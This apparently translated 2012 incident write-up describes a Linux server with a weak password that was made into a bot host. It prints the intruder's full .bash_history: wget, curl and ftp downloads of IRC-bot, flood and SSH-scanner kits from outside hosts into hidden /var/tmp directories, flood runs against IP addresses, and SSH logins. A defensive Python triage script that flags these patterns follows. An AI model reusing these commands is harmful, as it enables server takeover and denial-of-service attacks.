How a Linux Server Was Turned into a Zombie Host
Author: Anonymous (Technology)
Source: Linux systems
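Published: 2012-05-06
A Linux server with an Oracle database installed had an overly simple password, which led to it being turned into a zombie host (a bot under an intruder's control). The intruder's login records were mailed by Logwatch to the administrator's mailbox, where the administrator noticed them. Every step the intruder took was recorded in the .bash_history file.
Reminder: every account password must be strong enough that it cannot be guessed. Always run a log analysis program. Enable iptables and use it to deploy a security policy.
The intruder's steps were as follows: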
    cd /var/tmp
    wget www.bcsteel.com/~temp/seen.tgz
    wget 208.145.229.25/~temp/sen.tgz
    wget 208.145.229.25/~temp/seen.tgz
    passwd
    tar zxvf seen.tgz
    cd .undernet
    ./pico mech.set
    ./mech
    ./mech
    cd ..
    wget www.poarta6.lx.ro/sheitan.tgz
    cd .undernet/
    ./mech
    ls
    cd $HOME
    LS
    pwd
    cat .bash_profile
    ps x
    killall -9 ./mech
    killall -9 mech
    ls
    cd /var/tmp
    rm -rf .undernet
    tar zxvf seen.tgz
    cd .undernet
    ./pico mech.set
    ./mech
    ./mech
    ./mech
    ./mech
    w
    ps x
    killall -9 ./mech
    killall -9 mech
    cd /var/tmp
    ls
    cd .undernet/
    ./mech
    ./mech
    ./mech
    ./mech
    w
    wget http://www2.ati.com/drivers/wxp-w2k-catalyst-8-03-040610a-016126c.exe
    wget shadowhk.from.ro/bind
    mkdir ". ."
    ftp 64.34.66.18
    wget 65.182.102.104//loper/master/flod.tar.gz
    wget 65.182.102.104/loper/master/flod.tar.gz
    wget sirvic.com/flewd.tgz
    wget 82.165.128.200/flewd.tgz
    locate mech
    uname -a
    ls
    cd /var/tmp
    ls
    curl -O sirvic.com/flewd.tgz
    lynx sirvic.com/flewd.tgz
    wget lalaland.go.ro/juno
    ftp ftp.go.ro
    ftp 64.34.66.18
    mkdir ". ."
    cd ". ."
    vi s
    chmod x s
    ls
    ./s 12.105.145.123 80
    ./s 12.105.145.123 80 999
    killall -9 s
    ./s 203.113.252.174 80 999
    killall -9 s
    w
    ls
    cd /var/tmp
    ls
    ls -la
    cd .oracle
    ls
    cd ..
    wget http://208.145.229.83/~brett/.temp/dany3l/list2.tar.gz
    tar zxvf list2.tar.gz
    cd .bash
    ls
    ./a 203.174
    cd /var/tmp
    wget http://208.145.229.83/~brett/.temp/dany3l/dany.tgz
    tar xvf dany.tgz
    cd .dany
    ./make
    ./mech
    cat /proc/cpuinfo
    w
    cd /var/tmp
    wget session.lydo.org/scan3.tgz
    wget 64.111.196.20/scan3.tgz
    ftp 64.111.196.20
    wget http://208.145.229.83/~brett/.temp/dany3l/scan3.tgz
    http://208.145.229.83/~brett/.temp/dany3l/
    ftp ftp://brett:brett@208.145.229.83/usr/home/brett/public_html/.temp/dany3l/
    ftp 208.145.229.83
    wget http://208.145.229.83/~brett/.temp/dany3l/scan3.tar.gz
    wget http://208.145.229.83/~brett/.temp/dany3l/scan3.tar
    tar zxvf scan3.tar
    cd scan
    mv a assh
    ./auto
    ls
    head 21
    screen
    wget http://208.145.229.83/~brett/.temp/dany3l/screen
    ./screen
    cmdmode x screen
    chmod x screen
    ./screen
    cd /var/tmp/scan
    ks
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp
    cd scan
    ls
    cat vuln.txt
    screen -r
    ssh -l staff 211.21.139.28
    ssh -l 211.21.139.28 staff
    ssh -l staff 211.21.139.28
    cd /var/tmp
    ls
    cd scan
    ls
    cat vuln.txt
    scren -r
    screen -r
    cd /var/tmp/scan
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp
    ls
    cd scan` [
    cd scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp
    cd scan
    ls
    ps x
    ps x
    cd /var/tmp/scan
    l
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /vr/tmp/scn
    cd /var/tmp/scan
    ls
    cat vuln.txt
    screen -r
    cd /var/tmp/scan
    ls
    cat
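The history above shows three patterns a log review can look for: downloads made while sitting in /var/tmp, hidden or space-named directories, and binaries run from a temp directory. The Python script below is an added example, not part of the original article; the function names, rule names and sample lines are assumptions constructed for illustration, and it follows the working directory through cd commands to flag those patterns in a recovered .bash_history.

```python
import posixpath
import shlex

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable staging areas
FETCHERS = {"wget", "curl", "lynx", "ftp"}     # download tools used in the history above

def in_temp(path):
    return any(path == d or path.startswith(d + "/") for d in TEMP_DIRS)

def odd_dir(name):
    """True for names that hide from a casual ls: dot-prefixed or containing spaces."""
    base = posixpath.basename(name.rstrip("/"))
    return base not in ("", ".", "..") and (base.startswith(".") or " " in base)

def triage_history(lines, start_dir="~"):
    """Return (line_no, rule, command) findings, following cwd through cd commands."""
    cwd, findings = start_dir, []
    for no, raw in enumerate(lines, 1):
        try:
            argv = shlex.split(raw)
        except ValueError:            # unbalanced quote in a mistyped line
            argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd == "cd":
            target = args[0] if args else "~"
            if target.startswith(("~", "$")):   # home or unexpanded variable
                cwd = "~"
            else:                               # absolute replaces, relative resolves
                cwd = posixpath.normpath(posixpath.join(cwd, target))
            if in_temp(cwd) and odd_dir(cwd):
                findings.append((no, "hidden-dir-in-temp", raw))
        elif cmd == "mkdir" and any(odd_dir(a) for a in args):
            findings.append((no, "hidden-dir-created", raw))
        elif cmd in FETCHERS and in_temp(cwd):
            findings.append((no, "download-into-temp", raw))
        elif cmd.startswith("./") and in_temp(cwd):
            findings.append((no, "exec-from-temp", raw))
    return findings

# Constructed sample modelled on the history above; addresses are documentation ranges.
SAMPLE = ["cd /var/tmp", "wget 192.0.2.10/~temp/seen.tgz", "tar zxvf seen.tgz",
          "cd .undernet", "./mech", "cd $HOME", "cat .bash_profile", "cd /var/tmp",
          'mkdir ". ."', 'cd ". ."', "./s 198.51.100.7 80"]

if __name__ == "__main__":
    for no, rule, cmd in triage_history(SAMPLE):
        print(f"{no:>3}  {rule:<20} {cmd}")
```

A history file can be edited or truncated by whoever controls the account, so findings from it are a starting point to correlate with login records such as the Logwatch mail mentioned above.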